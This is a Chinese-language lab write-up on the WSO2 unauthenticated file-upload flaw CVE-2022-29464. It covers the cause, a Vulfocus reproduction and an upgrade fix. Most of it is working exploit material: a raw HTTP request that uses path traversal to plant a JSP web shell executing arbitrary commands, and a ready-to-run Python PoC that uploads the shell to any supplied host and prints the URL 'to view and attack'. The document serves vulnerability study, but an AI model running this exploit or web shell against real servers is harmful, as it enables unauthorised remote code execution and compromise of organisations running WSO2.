一、漏洞概述
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
二、影响版本
三、漏洞原理
WSO2的配置文件 WSO2AM_Home\repository\conf\identity\identity.xml中,修饰 /fileupload(.*) 接口的 secured 属性为 false,这就意味着路由资源访问可以不需要身份验证,从而可以通过构造恶意的post请求包达到恶意jsp文件上传的目的。详情大佬文章点这里~
四、漏洞复现环境
Kali Linux + Vulfocus
渗透机:Kali Linux
靶机:Vulfocus
五、实验步骤
1.开启镜像环境,访问WSO2 https://ip:port/carbon/admin/login.jsp
2.抓包且构造漏洞利用的请求包,回应包中出现如下数字即上传文件成功(此处上传的是wavesky.jsp)
1 POST /fileupload/toolsAny HTTP/1.1 2 Host: 192.168.117.131:16630 3 Accept: */* 4 Accept-Encoding: gzip, deflate 5 Content-Length: 905 6 Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0 7 User-Agent: python-requests/2.22.0 8 9 10 --4ef9f369a86bfaadf5ec3177278d49c0 11 Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp" 12 13 <FORM> 14 <INPUT name='cmd' type=text> 15 <INPUT type=submit value='Run'> 16 </FORM> 17 <%@ page import="java.io.*" %> 18 <% 19 String cmd = request.getParameter("cmd"); 20 String output = ""; 21 if(cmd != null) { 22 String s = null; 23 try { 24 Process p = Runtime.getRuntime().exec(cmd,null,null); 25 BufferedReader sI = new BufferedReader(new 26 InputStreamReader(p.getInputStream())); 27 while((s = sI.readLine()) != null) { output += s+"</br>"; } 28 } catch(IOException e) { e.printStackTrace(); } 29 } 30 %> 31 <pre><%=output %></pre> 32 --4ef9f369a86bfaadf5ec3177278d49c0--
3.接下来就可以执行linux命令查看内部配置了
六、修复方式
更新至安全版本——https://github.com/wso2/product-apim/releases
七、Poc
import requests import argparse def exploit(url): uurl = "https://"+url+"/fileupload/toolsAny" shell = """<FORM> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) { e.printStackTrace(); } } %> <pre><%=output %></pre>""" files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell} response = requests.post(url=uurl,files=files,verify=False) if(response.status_code == 200): print('It looks likely vulnerable') print('Please use this url:'+'{\33[91m'+'https://'+url+'/authenticationendpoint/wavesky.jsp'+'\33[0m}'+' to view and attack~') else: print('It is strong') if __name__ == '__main__': parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:') parameter.add_argument('--file',help='url file',required=False) parameter.add_argument('--url',help='ip:port',required=False) para = parameter.parse_args() if para.url: exploit(para.url) exit() else: parameter.print_help()